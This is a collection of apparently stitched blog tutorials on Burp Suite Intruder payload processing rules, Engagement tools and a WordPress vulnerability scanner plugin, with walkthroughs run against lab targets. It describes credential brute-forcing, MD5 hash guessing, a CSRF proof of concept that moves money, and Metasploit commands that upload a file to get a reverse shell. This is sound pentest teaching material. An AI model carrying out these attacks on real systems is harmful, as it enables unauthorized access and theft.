Payload Processing Rule in Burp suite (Part 2)

Hello friends!! Today we are going to discuss “Payload Encoding” option followed by payload processing of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Encode

The processing rule can be used to encode the payload using various schemes such as URL, HTML, Base64, ASCII hex or constructed strings.

Let’s start!!

First, we have intercepted the request of the login page of the router by giving its default IP which is 192.168.1.1, where we have given an invalid username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlight some value in the last line. Here it tells the type of authentication provided by router is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now select the encoded value of authentication for payload position and click to ADD button on the left side of frame.
  • Choose the Attack type as

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

The base64 encoded value of Authentication is combination of username and password now the scenario is to generate same encoded value of authentication with help of user password dictionary, therefore I have made a dictionary.

Before executing the attack we have added a payload processing rule to the payload type which is Encode and we have selected “Base64 encode” scheme because we know router takes the value in Base64.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because this will start brute force attack and try to match string for user authentication. In screenshot you can the status and length of the highlighted value is different from rest of values. This means we can use this encoded value to bypass the user authentication which occur from request number 10. Now check the username and password of 10th line in dictionary. 

And to confirm the username and password matched, we will give the password in the Router’s Login Page, which will successfully log us into the Router’s Configuration Page. This shows our success in the attack as shown in the image.

Decode

This processing rule can be used to decode the payload using various schemes: URL, HTML, Base64 or ASCII hex. As we know decoding is nothing but reversing the encoding. It can be used in an opposite way in which encoding is carried out.

Hash

This processing rule can be used to carry out a hashing operation on the payload. There are 7 types of hashing algorithms are available in this payload processing rule which is as follows:

  • SHA-384
  • SHA-224
  • SHA-256
  • MD5
  • MD2
  • SHA
  • SHA-512

First, we have intercepted the request of the Redirection Link designed to find redirection vulnerabilities in the LAB created by us and in the hash value of the URL we have given a wrong hash value of HTTP://www.google.com in place of the actual hash value of the HTTP://www.hackingarticles.in in the URL of the redirecting page. We have simply clicked on the Redirection link as shown in the image; the burp suite will capture the request of the redirecting page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack which is the hash value of the redirecting page and then click on Add button.
  • Choose the Attack type as sniper.

Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Hash and then we have selected MD5 which is a commonly used algorithm for converting URL of the websites into a Hash MD5 value. As you can see the input strings of the dictionary are in a simple text form, but this processing rule converts it into Hash MD5 values which can be seen in result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the Hash MD5 of the Redirecting Page which will give you the correct MD5 value. The moment it will find the correct value, it will change the value of length as shown in the image.

The Hash MD5 value, we will give the Hash value in the URL of the redirecting page which is HTTP://www.hackingarticles.in, which will successfully redirect us to HTTP://www.hackingarticles.in. This shows our success in the attack as shown in the image.

Add Raw Payload

This processing rule can be used to add raw payload value before or after the current processed value. For example it can come in handy whenever we want to submit the same payload in both raw and hashed form.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login , the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by right clicking on the space and selecting Send to Intruder option or simply press ctrl + i. Now open the Intruder tab then select Positions tab and the following will be visible. Choose the Attack type as Sniper. Press on the Clear button as shown in the image. Now we will select the fields where we want to attack which is the password and click on Add button.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as
  • In the given below image we have selected password that means we will need one dictionary files for password.

Before executing the attack we have added a payload processing rule to the payload type which is Add Raw Payload and then we have selected Append Pre-processed Payload. This adds a raw payload value before and after the current processed value. As you can see the input strings of the dictionary as single input string is repeated twice which can be seen in result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Skip if Matches Regex

This processing rule can be used to check the current processed value matches a specified regular expression, and if it matches it will skip the payload and will move onto the next one. For example, Suppose we have a parameter value that have a minimum length and want to skip values in the list that are shorter than minimum length defined.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as
  • In the given below image we have selected password that means we will need one dictionary files for password.

Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Skip if Matches Regex where we have given an input of {@} in the match regex field. Here we see that as per this rule if the input given matches with any of the input strings in the dictionary it simply skip that value and move on to next.

Now Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking ArticlesHe is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

Engagement Tools Tutorial in Burp suite

Hello friends!! Today we are going to discuss Importance of Engagement tools which is a Pro-only feature of Burp Suite. It is mainly used in information gathering and hence the analysis of any web application testing.

Its four important utilities are following:

  • Find References
  • Discover Content
  • Schedule Task
  • Generate CSRF POC

Find References

This function can be used to search all Burp suite tools for HTTP responses that link to a particular item. To make use of this function, select an HTTP request anywhere in Burp suite, or any part of the site map, and choose “Find references” in “Engagement tools” in the context menu which can be seen clicking Action Tab within Burp suite.

The result window of the search shows responses (from all Burp tools) that are link to the selected item. Whenever we view an individual search result, the response will be automatically highlighted to show where the linking reference is occurring.

This function treats the original URL as a Prefix whenever we search for links, so if you select a host, you will find all references related to the host and if you select a folder, you will find all references to items inside that folder.

First, we have intercepted the request of the Vulnweb.com which is a demo lab available over the internet which can be used for testing attacks. Then click on enter after writing the URL of the Vulnerable Web in your browser, then the burp suite will capture the request of the web page in the intercept tab.

Then click on Action Tab, after that select the Engagement tools then click on Find References. This will open a result window which will show all the references related to the URL whose request has been captured which is the Vulnerable Web as shown in the image.

Discover Content

This function is used to discover contents and functionality which are not linked with visible content that you can browse or spider.

There are various techniques that burp suite uses to discover content, which includes name guessing, web spidering, and extrapolation from naming conventions observed within the use of application.

Control

This tab shows you the current status of the session. The toggle button represents whether the session is running or not, and it also allows you pause and restart the session.

The following information is displayed about the progress of the discovery session:

  • Number of requests made
  • Number of bytes transferred in server responses
  • Number of network errors
  • Number of discovery tasks queued
  • Number of spider requests queued
  • Number of responses queued for analysis

Target

This option allows you to define or state the start directory of the content discovery session, and whether the files or directories should be targeted. The options that are available are as follows:

  • Start directory – This is the location where Burp suite is used to look for content. The items within this path and sub-directories are requested during the session.
  • Discover – This option can be used to determine whether the session will look for files or directories or both.

Site Map

The discovery session uses their own site map, showing all of the content which has been discovered within the defined scope. If you have configured your Burp suite to do so, newly discovered items can be added to Burp suite’s main site map.

First, we have intercepted the request of the Vulnweb.com which is a demo lab available over the internet which can be used for testing attacks. Then click on enter after writing the URL of the Vulnerable Web in your browser , then the burp suite will capture the request of the web page in the intercept tab.

Then click on Action Tab within the Burp suite, after that select the Engagement tools then click on Content Discovery. This will open a result window which will show the discovery session status and queued tasks which are related to the URL whose request has been captured which is the Vulnerable Web as shown in the image.

Schedule Task

This function can be used to automatically start and stop certain tasks at defined times and intervals. We can use the task scheduler to start and stop certain automated tasks while you are not working, and to save your work periodically or at a specific time.

To make use of this function, select an HTTP request anywhere in Burp suite, or any part of the target site map, and choose “Schedule task” within “Engagement tools” in the context menu which can be seen by clicking right within Burp suite.

The types of task that are available within this function are as follows:

  • Scan from a URL
  • Pause active scanning
  • Resume active scanning
  • Spider from a URL
  • Pause spidering
  • Resume spidering
  • Save state

First, we have intercepted the request of the vulnweb.com which is a demo lab available over the internet which can be used for testing attacks. Then click on enter after writing the URL of the Vulnerable Web in your browser , then the burp suite will capture the request of the web page in the intercept tab.

Then click on Action Tab within the Burp suite, after that select the Engagement tools then click on Schedule Task. This will open a window of schedule task options where we have selected Scan from a URL option as shown in the image.

Then Click Next a window will open where we have to give the URL we want to scan its branches from the site map.

Then Click Next we see that the scanner tab of the burp suite is open which scans all the branches beneath the site map of the given URL which is seen in the scan queue tab as shown in the image which are related to the URL whose request has been captured which is the Vulnerable Web as shown in the image.

Generate CSRF PoC

This function can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for any given request.

To access this function, select a URL or HTTP request anywhere in the Burp suite, and choose “Generate CSRF PoC” within “Engagement tools” in the context menu which can be seen by clicking right within Burp suite.

Let’s start!!

First, we have intercepted the request of the CSRF (transfer amount) option in the Bwapp LAB, where we have given an Account Number.

Then click on transfer, the burp suite will capture the request of the page in the intercept tab.

Then click  on Action Tab within the Burp suite, after that select the Engagement tools then click on Generate CSRF PoC. This will open a window of the CSRF PoC where we made a change in Account value and Amount value in CSRF HTML code as shown in the image.

After making changes in the values click on Test in Browser option or Copy HTML this will open the window of Show response in browser then click on COPY, and then paste it in the Browser and Press Enter as shown in the image.

We see a Submit request Button is seen in the browser after that click on it.

It appears to us that the amount is reduced as we have transferred the amount from the account by making changes in the CSRF HTML code as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking ArticlesHe is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

Payload Processing Rule in Burp suite (Part 1)

Hello friends!! Today we are going to discuss “Payload Processing” option of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Processing

Payload Processing can be defined as when payloads are generated using payload types, they can be further manipulated or filtered using various processing rules and payload encoding.

Payload Processing Rules

These rules are defined to perform various processing task on each payload before it is used. These rules are executed in a sequence, and they can be used to help debug any problem with the configuration. Payload processing rules are useful in situations where you need to generate different payloads, or where we want to wrap payloads within a wider structure or encoding scheme.

There are 12 types of payload processing rules available:

  • Add prefix
  • Add suffix
  • Match / Replace
  • Substring
  • Reverse substring
  • Modify case
  • Encode  
  • Decode
  • Hash
  • Add raw payload
  • Skip if matches regex
  • Invoke Burp extension

Let’s start!!

Add Prefix

This processing rule adds up a prefix before the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

 Before executing the attack we have added a payload processing rule to the payload type which is Add Prefix and we have given an input string “hash” which is added as a prefix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Add Suffix

This processing rule adds up a suffix after the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Add Suffix and we have given an input string “1234” which is added as a suffix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Match / Replace

This processing rule is used to replace any part of the payload that match a specific regular expression, with a string.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Match / Replace and we have given an input “9870” in the Match Regex which will match the input given with the input strings in the dictionary, if the there is a certain match than it will replace it with the input “1234” given in the Replace with as shown in the image.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Substring

This processing rule is used to extracts a sub-portion of the payload, starting from a specified offset up to a specified length. Here the offset and length are counted from the front.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Substring and we have given an input “0” in From option which specifies the offset and a input “3” in the Length option which specifies the length of the input strings.

For example if “password” is word in dictionary and we had applied above filter so it will place alphabet p = 0; a = 1; s = 2 and s = 3 hence it will read only pass from whole word “password”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Reverse Substring

This processing rule is used as a substring rule, but the end offset is specified counting backwards from the end of the payload, and the length is counted backwards from the end offset.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

  • Press on the Clear button given at right of window frame.
  • Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
  • Choose the Attack type as sniper
  • In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Reverse Substring and we have given an input “2” in From option which specifies the offset and an input “9” in the Length option which specifies the length of the input strings and they are similar to the Substring rule but it works from backwards of a offset and the length is counted backwards where the offset ends.

For example if “admin123456” is word in dictionary and we had applied above filter so it will place alphabet 4 = 0; 3 = 1 ; 2 = 2 ; 1 = 3 ; n = 4 ; i = 5 ; m = 6 ; d = 7 ; d = 8 ; a = 9  hence it will read  only ‘admin1234’ from whole word “admin123456”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Modify Case

This processing rule can be used to modify the case of the payload, if needed. This rule has the same options available for the Case Modification payload type which we have explained in Part-1 of the Payload types article.

Source: portswigger.net

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking ArticlesHe is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

WordPress Exploitation using Burpsuite (Burp_wp Plugin)

Burp_wp is an extension of burpsuite used to scan and find vulnerabilities in wordpress plugins and themes using burpsuite proxy. It was created by Kacper Szurek and can be downloaded from here.

Let’s begin

To run this extension we first need to install jython. Jython is an implementation of python programming that can run on java platform. You can download jython from here.

Now we download jython to burpsuite. We go to the python Environment and locate the jar file.

Now we go to extender, and select extensions tab to add the burp_wp extension.

We click on Add, a pop up will come. We select python as extension type and give the location at which the burp_wp file is located. We select “show in UI” for standard output and error to get any error if any occur.

As soon as the extension get installed we get the message in the image below that shows it was installed successfully.

Now we get a new “Burp WP” tab. Burp_WP automatically updates the first time it gets installed. It downloads the list of vulnerable plugins and theme from the database of WPscan.

Now we intercept the request of the website we want to scan for vulnerabilities.

As soon as we forward the request we go to Burp WP tab and we can find all the vulnerable plugins and themes on the website. We will get all vulnerable plugins and themes as we go through the site.

Now we use metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > set rhost 192.168.1.143

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > run

As soon as we run this exploit we get the reverse shell.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here